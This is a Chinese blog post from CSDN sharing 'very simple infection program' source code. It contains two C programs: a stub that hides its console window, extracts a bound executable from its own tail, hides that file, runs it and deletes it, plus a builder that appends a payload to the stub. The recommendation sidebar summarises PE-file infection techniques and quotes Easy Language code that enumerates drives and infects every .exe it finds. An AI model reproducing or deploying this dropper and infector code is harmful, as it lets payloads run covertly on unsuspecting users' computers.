非常简单的感染程序源代码

最新推荐文章于 2024-06-05 18:07:12 发布
最新推荐文章于 2024-06-05 18:07:12 发布
阅读量1.2k 收藏 2
点赞数 1
文章标签: 源码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xpy123993/article/details/20865597
版权

种子程序源码:

#include<stdio.h>
#include<string.h>
#include<windows.h>
int FileLastAddr=0;
const char FESymbol[5]="over";
bool ifExist(char* FileName)
{
	char SymbolTemp[5];
    FILE *fp=fopen(FileName,"rb");
	fseek(fp,-(sizeof(FESymbol)),SEEK_END);
	fread(SymbolTemp,sizeof(char),5,fp);
	fclose(fp);
	if(!strcmp(FESymbol,SymbolTemp)){
		return true;
	}
	return false;
}
void GetExe(char* FileName){
	long FileLength;
	char Buff[1024];
	char NewName[255];
	FILE *fp=fopen(FileName,"rb");
	fseek(fp,-(sizeof(FESymbol)+sizeof(long)),SEEK_END);
	fread(&FileLength,sizeof(int),1,fp);
	fseek(fp,-(sizeof(FESymbol)+sizeof(long)+FileLength),SEEK_END);
	strcpy(NewName,FileName);
	strcat(NewName,".exe");
	DeleteFile(NewName);
	FILE *NO=fopen(NewName,"wb+");
	while(FileLength>0){
		fread(Buff,sizeof(char),FileLength>1024?1024:FileLength,fp);
		fwrite(Buff,sizeof(char),FileLength>1024?1024:FileLength,NO);
		FileLength-=1024;
	}
	fclose(fp);
	SetFileAttributes(NewName, FILE_ATTRIBUTE_HIDDEN);
	fclose(NO);
	STARTUPINFO si={sizeof(si)};
	PROCESS_INFORMATION pi;
	CreateProcess(NULL,NewName,NULL,NULL,false,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi);
	WaitForSingleObject(pi.hThread,INFINITE);
	DeleteFile(NewName);
}
int main(int args,char*argv[]){
    HANDLE hCon = GetStdHandle(STD_OUTPUT_HANDLE);
    char szTitle[256];
    GetConsoleTitle(szTitle,256);
    HWND hWin = FindWindow("ConsoleWindowClass",szTitle);
    ShowWindow(hWin,FALSE);
	if(ifExist(argv[0]))
		GetExe(argv[0]);
	return 0;
}

制作程序源码:

#include<stdio.h>
#include<string.h>
#include<windows.h>
const char FESymbol[5]="over";
void Write(char* FileName)
{
    FILE *fp=fopen("ExeInject.exe","rb+");
    if(~fseek(fp,0l,2))printf("Read Orginal File Successful!\n");
    long FileLength=0;
    int thiso=-1;
    char Buff[1024];
    FILE *S=fopen(FileName,"rb");
    fseek(S,0,0);
    while(thiso)
    {
        thiso=fread(Buff,sizeof(char),1024,S);
        fwrite(Buff,sizeof(char),thiso,fp);
        FileLength+=thiso;
    }
    fwrite(&FileLength,sizeof(long),1,fp);
    fwrite(FESymbol,sizeof(char),5,fp);
    fclose(fp);
}
bool isExist(char* FileName)
{
    char SymbolTemp[5];
    FILE *fp=fopen(FileName,"rb");

	fseek(fp,-sizeof(FESymbol),SEEK_END);
	fread(SymbolTemp,sizeof(char),5,fp);
	fclose(fp);

	if(strcmp(FESymbol,SymbolTemp))return false;
    long FileLength;
	char Buff[1024];
	char NewName[255]="ExeInject.exe";
	fp=fopen(FileName,"rb");
	fseek(fp,-(sizeof(FESymbol)+sizeof(long)),SEEK_END);
	fread(&FileLength,sizeof(int),1,fp);
	fseek(fp,-(sizeof(FESymbol)+sizeof(long)+FileLength),SEEK_END);
	DeleteFile(NewName);
	FILE *NO=fopen(NewName,"wb+");
	int nowread=0;
	while(FileLength>0){
		nowread=fread(Buff,sizeof(char),FileLength>1024?1024:FileLength,fp);
		fwrite(Buff,sizeof(char),FileLength>nowread?nowread:FileLength,NO);
		FileLength-=nowread;
	}
	fclose(fp);
	fclose(NO);
	return true;
}
int main(int args,char* argv[])
{
    if(isExist(argv[0])){
        printf("BindFile:");
        char FileName[255];
        gets(FileName);
        Write(FileName);
    }
    else{
        FILE *fp=fopen(argv[0],"r+");
        if(!fp)printf("Fuck!!!!");
        long FileLength=0;
        int thiso=-1;
        char Buff[1024];
        FILE *S=fopen("ExeInject.exe","rb+");
        fseek(S,0,0);
        while(thiso)
        {
            thiso=fread(Buff,sizeof(char),1024,S);
            fwrite(Buff,sizeof(char),thiso,fp);
            FileLength+=thiso;
        }
        fwrite(&FileLength,sizeof(long),1,fp);
        fwrite(FESymbol,sizeof(char),5,fp);
        fclose(fp);
    }
    return 0;
}


 

PhantomIG
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
感染PE文件示例源码(C++与汇编)
03-25
感染PE文件示例源码(C++与汇编编写)并提供使用示例
PE文件的感染C++源代码
01-17
PE文件的感染C++源代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先执行自己写的dll,执行完后,再跳转到原代码人口处执行。 导入地址感染。这个相对简单些,在PE文件头部分,IMAGE_OPTION_HEADER中有个ImportAddress目录,这个目录中只是一些jmp指令,我们可以修改jmp指令跳转的地址,使其指向在PE文件中我们新增加的代码。这需要在原PE文件中增加代码,PE文件在硬盘上默认200H字节对齐,一般存有空隙,如果代码量小,不用增加新节就可以插入代码。 修改入口函数地址。这个是最省事的办法,在原PE文件中新增加一个节,计算新节的RVA,然后修改入口代码,使其指向新增加的节。当然,如果.text节空隙足够大的话,不用添加新节也可以。 修改快捷方式文件。如果PE文件存在快捷方式,可以先行感染快捷方式,使快捷方式指向自己写的程序,自写程序启动后,再执行真正的PE文件。这种做法比较猥琐,而且不可靠。
捆绑感染 思路实现
冷风
09-05 1008
这是 写捆绑感染时,随手写的思路记录,本来想写个详细的教程,但看目前情形是完成不了啦 做出的 捆绑器  效果蛮好的 难度不大 稍微记录一下 ...了解了这个思路 自己再做也不困难  捆绑部分 1复制自己到一个临时文件 2添加第一个要捆绑的文件到文件尾 3添加第二个要捆绑的文件到文件尾 5分别获取三个文件的长度名称和捆绑标记并写入文件尾部 
感染恶意代码之后怎么办?
最新发布
ershuiyan的博客
06-05 288
确保设备上的操作系统、应用程序和安全软件都是最新的版本,并及时安装所有安全补丁和更新。如果认为设备感染了恶意代码,并且可能对个人、组织或其他用户造成影响,应及时向相关安全团队或当局报告事件,并遵循其指导和建议。立即将感染设备与网络隔离,断开与互联网和其他设备的连接。对恶意代码事件进行彻底的调查和分析,从中吸取经验教训,加强未来的安全措施和应对能力。对设备和网络进行持续的监控和审查,以便及时发现和响应任何异常活动或潜在的安全威胁。采取适当的措施(寻求专业的安全专家或团队)清除感染的恶意代码。
简单感染PE文件
liujiayu2的专栏
10-08 1245
这个感染方式和win9x时代的CIH病毒感染方式很像。。。 @PandaOS 这个程序的感染标识放在了DOS头中。。。因为DOS头只有MZ和最后一个指向PE头的指针很重要,改了就完蛋了。。。别的几乎用不到 所以修改DOS头的话,只要不修改首尾字段,几乎不会影响程序的运行。 源程序 感染后的 感染前程序的入口 感染后程序的入口 只要搜索节中的空隙,然后将代码分成几
loadEXEPE感染详细VC源码注释
qq_42577465的博客
06-03 312
// loadEXE.cpp : Defines the entry point for the console application. //实现将笔记本程序插入到计算器程序并替换掉程序进程名 #include "stdafx.h" #include <windows.h> #include <stdio.h> struct MZHeader //DOS { ...
IBM WebSphere源代码暴露漏洞
01-20
暴露源代码的后果非常严重,因为攻击者能够获取到应用程序的内部逻辑、敏感信息、数据库连接字符串以及其他可能用于进一步攻击的有价值数据。这可能导致数据泄露、权限提升、服务中断,甚至完全控制受感染的服务器。...
简单杀毒软件源代码
06-07
本项目名为"简单杀毒软件源代码",其核心是提供了一个基础的木马扫描器的实现,旨在帮助开发者或安全研究人员了解杀毒软件的基础架构和工作方式。 首先,我们要理解木马是一种恶意软件,它伪装成无害的程序来欺骗...
易语言写EXE应用程序感染源代码
04-23
标题中的“易语言写EXE应用程序感染源代码”指的是使用易语言编写的一种恶意代码技术,该技术能够将恶意代码注入到可执行文件(EXE)中,使得原本无害的应用程序在运行时会感染其他程序。易语言是中国自主研发的一种...
易语言源代码-exe感染与清除源码.rar
06-06
在“易语言源代码-exe感染与清除源码.rar”这个压缩包中,包含的是针对exe可执行文件的病毒感染及清除相关的源代码。 首先,我们需要了解什么是exe感染。在计算机领域,exe感染通常指的是病毒、木马等恶意软件通过...
如何实现可执行文件的感染
my2005lb的专栏
04-11 1153
  做了一个小程序实现的是对可执行程序的感染,原理很简单.test.exe是我们要感染的文件, 我们要把我们自己的一个文件添加到其前面去,就实现了如果用户点击这一文件,先执行我们的程序.其相关代码如下:#include#include#includevoid main(){ FILE *fp ; FILE *fp1; if( ( fp = fopen("test1.exe","wb
感染U盘程序(C++代码)
09-15
感染U盘程序(C++代码),一个绝对值得一学并展示在别人面前的小程序!
感染exe的测试源码
08-21
含源码,研究使用,大家在不读懂的情况下不要运行。{我们交流的是技术,展示的源代码和相关代码的目的只是为了说明技术的原理和使用。如果任何个人或组织利用本文档发布的技术进行破坏,应由其本人负责。
易语言源码易语言插节感染源码.rar
02-19
易语言源码易语言插节感染源码.rar 易语言源码易语言插节感染源码.rar 易语言源码易语言插节感染源码.rar 易语言源码易语言插节感染源码.rar 易语言源码易语言插节感染源码.rar 易语言源码易语言插节感染源码.rar易语言源码易语言插节感染源码.rar 易语言源码易语言插节感染源码.rar
易语言源码易语言插件感染源码.rar
03-31
易语言源码易语言插件感染源码.rar
易语言插件感染源码-易语言
06-13
易语言插件感染源码
感染导入表方法-附源码(转载)
weixin_30481087的博客
07-15 88
在explorer.exe中添加了MyDLL.dll的一个导出函数MainFun,如果你想先看看效果可以先把附件下下来,把其中的MyDLL.dll放入环境变量path目录中,例如system32目录就可满足你的需要,然后运行InfectImport.exe,你会看到一个对话框“MainFun成功导入explorer.exe”,因为我在dll被加载时启动了一个线程,然后输出这句话,是不是有点小题大作...
易语言插节感染
07-22
易语言插节感染源码,插节感染,GetDword,GetWord,SetDword,SetWord,GetbyteAddress,GetTextAddress,CopyMemory,ZeroMemory,Initialize,Close,Infect,PEAlign,CreateFile,CloseHandle,GetFileSize,WriteFile,ReadFile,SetFilePointer,CopyFile,GlobalAlloc,Glob
易语言 写exe感染批量捆绑程序,仿熊猫程序
06-01
.版本 2 处理事件 () 编辑框1.内容 = 到文本 (列表框1.取项目数 ()) .如果真 (取文本右边 (目录, 1) ≠ “\”) 目录 = 目录 + “\” .如果真结束 文件名 = 寻找文件 (目录 + “*.exe”, ) .判断循环首 (文件名 ≠ “”) 感染 (目录 + 文件名, , #寄宿文件, 目录 + 文件名) 列表框1.加入项目 (目录 + 文件名, ) 编辑框2.内容 = 列表框1.取项目文本 (到数值 (编辑框1.内容)) 文件名 = 寻找文件 (, ) .判断循环尾 () 驱动枚举 .版本 2 .支持库 eAPI a = 取驱动器列表 () n = n + 1 枚举目录 (a [n]) .判断循环首 (a [n] ≠ “”) n = n + 1 .如果 (n ≤ 取驱动器数量 ()) 枚举目录 (a [n]) .否则 跳出循环 () .如果结束 .判断循环尾 ()
智能电表主控程序源代码详解
"该资源是一份关于智能电表主控程序的源代码,由freevanx和LDZ设计,创建于2006年9月29日。该程序主要功能包括计算电量和电费,接收并显示用户在LCD上的信息输入,以及允许用户通过键盘设置内部计费参数以适应不同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值